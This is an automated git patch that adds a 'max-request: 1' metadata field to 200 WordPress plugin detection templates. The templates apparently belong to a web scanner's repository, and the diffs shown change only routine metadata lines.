From a5af4a1f440edd12932af76cff911cc82debb824 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Wed, 27 Sep 2023 04:48:39 +0000
Subject: [PATCH 0554/1090] TemplateMan Update [Wed Sep 27 04:48:39 UTC 2023]
 :robot:

---
 http/technologies/wordpress/plugins/ad-inserter.yaml             | 1 +
 http/technologies/wordpress/plugins/add-to-any.yaml              | 1 +
 http/technologies/wordpress/plugins/admin-menu-editor.yaml       | 1 +
 http/technologies/wordpress/plugins/advanced-custom-fields.yaml  | 1 +
 http/technologies/wordpress/plugins/akismet.yaml                 | 1 +
 .../wordpress/plugins/all-404-redirect-to-homepage.yaml          | 1 +
 http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml     | 1 +
 http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 +
 .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml   | 1 +
 http/technologies/wordpress/plugins/amp.yaml                     | 1 +
 http/technologies/wordpress/plugins/antispam-bee.yaml            | 1 +
 http/technologies/wordpress/plugins/astra-sites.yaml             | 1 +
 http/technologies/wordpress/plugins/astra-widgets.yaml           | 1 +
 http/technologies/wordpress/plugins/autoptimize.yaml             | 1 +
 http/technologies/wordpress/plugins/backwpup.yaml                | 1 +
 http/technologies/wordpress/plugins/better-search-replace.yaml   | 1 +
 http/technologies/wordpress/plugins/better-wp-security.yaml      | 1 +
 .../wordpress/plugins/black-studio-tinymce-widget.yaml           | 1 +
 http/technologies/wordpress/plugins/breadcrumb-navxt.yaml        | 1 +
 http/technologies/wordpress/plugins/breeze.yaml                  | 1 +
 http/technologies/wordpress/plugins/broken-link-checker.yaml     | 1 +
 .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 +
 http/technologies/wordpress/plugins/classic-editor.yaml          | 1 +
 http/technologies/wordpress/plugins/classic-widgets.yaml         | 1 +
 .../wordpress/plugins/click-to-chat-for-whatsapp.yaml            | 1 +
 http/technologies/wordpress/plugins/cmb2.yaml                    | 1 +
 http/technologies/wordpress/plugins/coblocks.yaml                | 1 +
 http/technologies/wordpress/plugins/code-snippets.yaml           | 1 +
 http/technologies/wordpress/plugins/coming-soon.yaml             | 1 +
 http/technologies/wordpress/plugins/complianz-gdpr.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 +
 http/technologies/wordpress/plugins/contact-form-7.yaml          | 1 +
 http/technologies/wordpress/plugins/contact-form-cfdb7.yaml      | 1 +
 http/technologies/wordpress/plugins/cookie-law-info.yaml         | 1 +
 http/technologies/wordpress/plugins/cookie-notice.yaml           | 1 +
 http/technologies/wordpress/plugins/creame-whatsapp-me.yaml      | 1 +
 .../wordpress/plugins/creative-mail-by-constant-contact.yaml     | 1 +
 http/technologies/wordpress/plugins/custom-css-js.yaml           | 1 +
 http/technologies/wordpress/plugins/custom-fonts.yaml            | 1 +
 http/technologies/wordpress/plugins/custom-post-type-ui.yaml     | 1 +
 http/technologies/wordpress/plugins/disable-comments.yaml        | 1 +
 http/technologies/wordpress/plugins/disable-gutenberg.yaml       | 1 +
 http/technologies/wordpress/plugins/duplicate-page.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicate-post.yaml          | 1 +
 http/technologies/wordpress/plugins/duplicator.yaml              | 1 +
 .../wordpress/plugins/duracelltomi-google-tag-manager.yaml       | 1 +
 http/technologies/wordpress/plugins/easy-fancybox.yaml           | 1 +
 http/technologies/wordpress/plugins/easy-table-of-contents.yaml  | 1 +
 http/technologies/wordpress/plugins/easy-wp-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/elementor.yaml               | 1 +
 http/technologies/wordpress/plugins/elementskit-lite.yaml        | 1 +
 http/technologies/wordpress/plugins/enable-media-replace.yaml    | 1 +
 http/technologies/wordpress/plugins/envato-elements.yaml         | 1 +
 .../wordpress/plugins/essential-addons-for-elementor-lite.yaml   | 1 +
 http/technologies/wordpress/plugins/ewww-image-optimizer.yaml    | 1 +
 .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 +
 http/technologies/wordpress/plugins/fast-indexing-api.yaml       | 1 +
 .../wordpress/plugins/favicon-by-realfavicongenerator.yaml       | 1 +
 http/technologies/wordpress/plugins/flamingo.yaml                | 1 +
 http/technologies/wordpress/plugins/fluentform.yaml              | 1 +
 http/technologies/wordpress/plugins/font-awesome.yaml            | 1 +
 .../wordpress/plugins/force-regenerate-thumbnails.yaml           | 1 +
 http/technologies/wordpress/plugins/formidable.yaml              | 1 +
 http/technologies/wordpress/plugins/forminator.yaml              | 1 +
 http/technologies/wordpress/plugins/ga-google-analytics.yaml     | 1 +
 http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml  | 1 +
 .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml     | 1 +
 .../wordpress/plugins/google-analytics-for-wordpress.yaml        | 1 +
 http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 +
 http/technologies/wordpress/plugins/google-site-kit.yaml         | 1 +
 .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 +
 http/technologies/wordpress/plugins/gtranslate.yaml              | 1 +
 http/technologies/wordpress/plugins/gutenberg.yaml               | 1 +
 http/technologies/wordpress/plugins/happy-elementor-addons.yaml  | 1 +
 .../wordpress/plugins/header-footer-code-manager.yaml            | 1 +
 http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 +
 http/technologies/wordpress/plugins/header-footer.yaml           | 1 +
 http/technologies/wordpress/plugins/health-check.yaml            | 1 +
 http/technologies/wordpress/plugins/hello-dolly.yaml             | 1 +
 http/technologies/wordpress/plugins/host-webfonts-local.yaml     | 1 +
 http/technologies/wordpress/plugins/imagify.yaml                 | 1 +
 http/technologies/wordpress/plugins/imsanity.yaml                | 1 +
 .../wordpress/plugins/insert-headers-and-footers.yaml            | 1 +
 http/technologies/wordpress/plugins/instagram-feed.yaml          | 1 +
 .../wordpress/plugins/intuitive-custom-post-order.yaml           | 1 +
 http/technologies/wordpress/plugins/iwp-client.yaml              | 1 +
 http/technologies/wordpress/plugins/jetpack-boost.yaml           | 1 +
 http/technologies/wordpress/plugins/jetpack.yaml                 | 1 +
 http/technologies/wordpress/plugins/kadence-blocks.yaml          | 1 +
 http/technologies/wordpress/plugins/kirki.yaml                   | 1 +
 http/technologies/wordpress/plugins/leadin.yaml                  | 1 +
 .../wordpress/plugins/limit-login-attempts-reloaded.yaml         | 1 +
 http/technologies/wordpress/plugins/limit-login-attempts.yaml    | 1 +
 http/technologies/wordpress/plugins/litespeed-cache.yaml         | 1 +
 http/technologies/wordpress/plugins/loco-translate.yaml          | 1 +
 http/technologies/wordpress/plugins/loginizer.yaml               | 1 +
 .../wordpress/plugins/mailchimp-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/mailchimp-for-wp.yaml        | 1 +
 http/technologies/wordpress/plugins/mailpoet.yaml                | 1 +
 http/technologies/wordpress/plugins/maintenance.yaml             | 1 +
 http/technologies/wordpress/plugins/mainwp-child.yaml            | 1 +
 http/technologies/wordpress/plugins/malcare-security.yaml        | 1 +
 http/technologies/wordpress/plugins/megamenu.yaml                | 1 +
 http/technologies/wordpress/plugins/members.yaml                 | 1 +
 http/technologies/wordpress/plugins/meta-box.yaml                | 1 +
 http/technologies/wordpress/plugins/ml-slider.yaml               | 1 +
 http/technologies/wordpress/plugins/newsletter.yaml              | 1 +
 .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 +
 http/technologies/wordpress/plugins/nextgen-gallery.yaml         | 1 +
 http/technologies/wordpress/plugins/ninja-forms.yaml             | 1 +
 http/technologies/wordpress/plugins/ocean-extra.yaml             | 1 +
 http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 +
 http/technologies/wordpress/plugins/one-click-demo-import.yaml   | 1 +
 http/technologies/wordpress/plugins/optinmonster.yaml            | 1 +
 http/technologies/wordpress/plugins/otter-blocks.yaml            | 1 +
 http/technologies/wordpress/plugins/password-protected.yaml      | 1 +
 http/technologies/wordpress/plugins/pdf-embedder.yaml            | 1 +
 .../wordpress/plugins/pinterest-for-woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/pixelyoursite.yaml           | 1 +
 http/technologies/wordpress/plugins/polylang.yaml                | 1 +
 http/technologies/wordpress/plugins/popup-builder.yaml           | 1 +
 http/technologies/wordpress/plugins/popup-maker.yaml             | 1 +
 http/technologies/wordpress/plugins/post-smtp.yaml               | 1 +
 http/technologies/wordpress/plugins/post-types-order.yaml        | 1 +
 .../wordpress/plugins/premium-addons-for-elementor.yaml          | 1 +
 http/technologies/wordpress/plugins/pretty-link.yaml             | 1 +
 http/technologies/wordpress/plugins/really-simple-captcha.yaml   | 1 +
 http/technologies/wordpress/plugins/really-simple-ssl.yaml       | 1 +
 http/technologies/wordpress/plugins/redirection.yaml             | 1 +
 http/technologies/wordpress/plugins/redux-framework.yaml         | 1 +
 http/technologies/wordpress/plugins/regenerate-thumbnails.yaml   | 1 +
 http/technologies/wordpress/plugins/safe-svg.yaml                | 1 +
 http/technologies/wordpress/plugins/seo-by-rank-math.yaml        | 1 +
 http/technologies/wordpress/plugins/sg-cachepress.yaml           | 1 +
 http/technologies/wordpress/plugins/sg-security.yaml             | 1 +
 http/technologies/wordpress/plugins/shortcodes-ultimate.yaml     | 1 +
 .../wordpress/plugins/shortpixel-image-optimiser.yaml            | 1 +
 .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 +
 http/technologies/wordpress/plugins/siteguard.yaml               | 1 +
 http/technologies/wordpress/plugins/siteorigin-panels.yaml       | 1 +
 http/technologies/wordpress/plugins/smart-slider-3.yaml          | 1 +
 http/technologies/wordpress/plugins/so-widgets-bundle.yaml       | 1 +
 .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml   | 1 +
 http/technologies/wordpress/plugins/sucuri-scanner.yaml          | 1 +
 http/technologies/wordpress/plugins/svg-support.yaml             | 1 +
 http/technologies/wordpress/plugins/table-of-contents-plus.yaml  | 1 +
 http/technologies/wordpress/plugins/tablepress.yaml              | 1 +
 http/technologies/wordpress/plugins/taxonomy-terms-order.yaml    | 1 +
 http/technologies/wordpress/plugins/the-events-calendar.yaml     | 1 +
 http/technologies/wordpress/plugins/themeisle-companion.yaml     | 1 +
 http/technologies/wordpress/plugins/tinymce-advanced.yaml        | 1 +
 .../wordpress/plugins/translatepress-multilingual.yaml           | 1 +
 .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml         | 1 +
 http/technologies/wordpress/plugins/under-construction-page.yaml | 1 +
 http/technologies/wordpress/plugins/updraftplus.yaml             | 1 +
 http/technologies/wordpress/plugins/use-any-font.yaml            | 1 +
 http/technologies/wordpress/plugins/user-role-editor.yaml        | 1 +
 .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 +
 http/technologies/wordpress/plugins/w3-total-cache.yaml          | 1 +
 .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 +
 http/technologies/wordpress/plugins/webp-express.yaml            | 1 +
 .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 +
 .../wordpress/plugins/woo-cart-abandonment-recovery.yaml         | 1 +
 .../wordpress/plugins/woo-checkout-field-editor-pro.yaml         | 1 +
 http/technologies/wordpress/plugins/woo-variation-swatches.yaml  | 1 +
 .../plugins/woocommerce-gateway-paypal-express-checkout.yaml     | 1 +
 .../wordpress/plugins/woocommerce-gateway-stripe.yaml            | 1 +
 http/technologies/wordpress/plugins/woocommerce-payments.yaml    | 1 +
 .../wordpress/plugins/woocommerce-paypal-payments.yaml           | 1 +
 .../plugins/woocommerce-pdf-invoices-packing-slips.yaml          | 1 +
 http/technologies/wordpress/plugins/woocommerce-services.yaml    | 1 +
 http/technologies/wordpress/plugins/woocommerce.yaml             | 1 +
 http/technologies/wordpress/plugins/wordfence.yaml               | 1 +
 http/technologies/wordpress/plugins/wordpress-importer.yaml      | 1 +
 http/technologies/wordpress/plugins/wordpress-seo.yaml           | 1 +
 http/technologies/wordpress/plugins/worker.yaml                  | 1 +
 http/technologies/wordpress/plugins/wp-fastest-cache.yaml        | 1 +
 http/technologies/wordpress/plugins/wp-file-manager.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-google-maps.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-mail-smtp.yaml            | 1 +
 http/technologies/wordpress/plugins/wp-maintenance-mode.yaml     | 1 +
 http/technologies/wordpress/plugins/wp-migrate-db.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-multibyte-patch.yaml      | 1 +
 http/technologies/wordpress/plugins/wp-optimize.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-pagenavi.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-reset.yaml                | 1 +
 .../wordpress/plugins/wp-reviews-plugin-for-google.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-rollback.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-seopress.yaml             | 1 +
 http/technologies/wordpress/plugins/wp-sitemap-page.yaml         | 1 +
 http/technologies/wordpress/plugins/wp-smushit.yaml              | 1 +
 http/technologies/wordpress/plugins/wp-statistics.yaml           | 1 +
 http/technologies/wordpress/plugins/wp-super-cache.yaml          | 1 +
 http/technologies/wordpress/plugins/wp-user-avatar.yaml          | 1 +
 http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml         | 1 +
 http/technologies/wordpress/plugins/wpcf7-redirect.yaml          | 1 +
 http/technologies/wordpress/plugins/wpforms-lite.yaml            | 1 +
 http/technologies/wordpress/plugins/wps-hide-login.yaml          | 1 +
 http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml   | 1 +
 .../wordpress/plugins/yith-woocommerce-wishlist.yaml             | 1 +
 200 files changed, 200 insertions(+)

diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml
index 7cbd1855ae..ebb5ba1042 100644
--- a/http/technologies/wordpress/plugins/ad-inserter.yaml
+++ b/http/technologies/wordpress/plugins/ad-inserter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ad-inserter/
   metadata:
+    max-request: 1
     plugin_namespace: ad-inserter
     wpscan: https://wpscan.com/plugin/ad-inserter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml
index 8d579ff23d..fddfbf3118 100644
--- a/http/technologies/wordpress/plugins/add-to-any.yaml
+++ b/http/technologies/wordpress/plugins/add-to-any.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/add-to-any/
   metadata:
+    max-request: 1
     plugin_namespace: add-to-any
     wpscan: https://wpscan.com/plugin/add-to-any
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
index 4a6d8b7bbe..7a6e8a76ec 100644
--- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml
+++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/admin-menu-editor/
   metadata:
+    max-request: 1
     plugin_namespace: admin-menu-editor
     wpscan: https://wpscan.com/plugin/admin-menu-editor
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
index e4eb308d39..940c0e614c 100644
--- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
+++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/advanced-custom-fields/
   metadata:
+    max-request: 1
     plugin_namespace: advanced-custom-fields
     wpscan: https://wpscan.com/plugin/advanced-custom-fields
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml
index f68ad2a6bf..ac77f4e5f5 100644
--- a/http/technologies/wordpress/plugins/akismet.yaml
+++ b/http/technologies/wordpress/plugins/akismet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/akismet/
   metadata:
+    max-request: 1
     plugin_namespace: akismet
     wpscan: https://wpscan.com/plugin/akismet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
index 10f104f2c7..90aa5881fd 100644
--- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
+++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-404-redirect-to-homepage/
   metadata:
+    max-request: 1
     plugin_namespace: all-404-redirect-to-homepage
     wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
index 8addc28ded..1bf337da6c 100644
--- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-seo-pack/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-seo-pack
     wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
index 2e579621ac..7cec152555 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-migration/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-migration
     wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
index 41e297ffeb..8a4b6133cd 100644
--- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
+++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
   metadata:
+    max-request: 1
     plugin_namespace: all-in-one-wp-security-and-firewall
     wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml
index 0dd8686ec3..cfa2e3d080 100644
--- a/http/technologies/wordpress/plugins/amp.yaml
+++ b/http/technologies/wordpress/plugins/amp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/amp/
   metadata:
+    max-request: 1
     plugin_namespace: amp
     wpscan: https://wpscan.com/plugin/amp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml
index 359671f3bd..a92d9bde4e 100644
--- a/http/technologies/wordpress/plugins/antispam-bee.yaml
+++ b/http/technologies/wordpress/plugins/antispam-bee.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/antispam-bee/
   metadata:
+    max-request: 1
     plugin_namespace: antispam-bee
     wpscan: https://wpscan.com/plugin/antispam-bee
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-sites/
   metadata:
+    max-request: 1
     plugin_namespace: astra-sites
     wpscan: https://wpscan.com/plugin/astra-sites
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/astra-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: astra-widgets
     wpscan: https://wpscan.com/plugin/astra-widgets
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/autoptimize/
   metadata:
+    max-request: 1
     plugin_namespace: autoptimize
     wpscan: https://wpscan.com/plugin/autoptimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/backwpup/
   metadata:
+    max-request: 1
     plugin_namespace: backwpup
     wpscan: https://wpscan.com/plugin/backwpup
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-search-replace/
   metadata:
+    max-request: 1
     plugin_namespace: better-search-replace
     wpscan: https://wpscan.com/plugin/better-search-replace
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/better-wp-security/
   metadata:
+    max-request: 1
     plugin_namespace: better-wp-security
     wpscan: https://wpscan.com/plugin/better-wp-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/black-studio-tinymce-widget/
   metadata:
+    max-request: 1
     plugin_namespace: black-studio-tinymce-widget
     wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breadcrumb-navxt/
   metadata:
+    max-request: 1
     plugin_namespace: breadcrumb-navxt
     wpscan: https://wpscan.com/plugin/breadcrumb-navxt
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/breeze/
   metadata:
+    max-request: 1
     plugin_namespace: breeze
     wpscan: https://wpscan.com/plugin/breeze
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/broken-link-checker/
   metadata:
+    max-request: 1
     plugin_namespace: broken-link-checker
     wpscan: https://wpscan.com/plugin/broken-link-checker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/child-theme-configurator/
   metadata:
+    max-request: 1
     plugin_namespace: child-theme-configurator
     wpscan: https://wpscan.com/plugin/child-theme-configurator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-editor/
   metadata:
+    max-request: 1
     plugin_namespace: classic-editor
     wpscan: https://wpscan.com/plugin/classic-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/classic-widgets/
   metadata:
+    max-request: 1
     plugin_namespace: classic-widgets
     wpscan: https://wpscan.com/plugin/classic-widgets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/click-to-chat-for-whatsapp/
   metadata:
+    max-request: 1
     plugin_namespace: click-to-chat-for-whatsapp
     wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/cmb2/
   metadata:
+    max-request: 1
     plugin_namespace: cmb2
     wpscan: https://wpscan.com/plugin/cmb2
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coblocks/
   metadata:
+    max-request: 1
     plugin_namespace: coblocks
     wpscan: https://wpscan.com/plugin/coblocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/code-snippets/
   metadata:
+    max-request: 1
     plugin_namespace: code-snippets
     wpscan: https://wpscan.com/plugin/code-snippets
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/coming-soon/
   metadata:
+    max-request: 1
     plugin_namespace: coming-soon
     wpscan: https://wpscan.com/plugin/coming-soon
   tags: tech,wordpress,wp-plugin,top-100,top-200
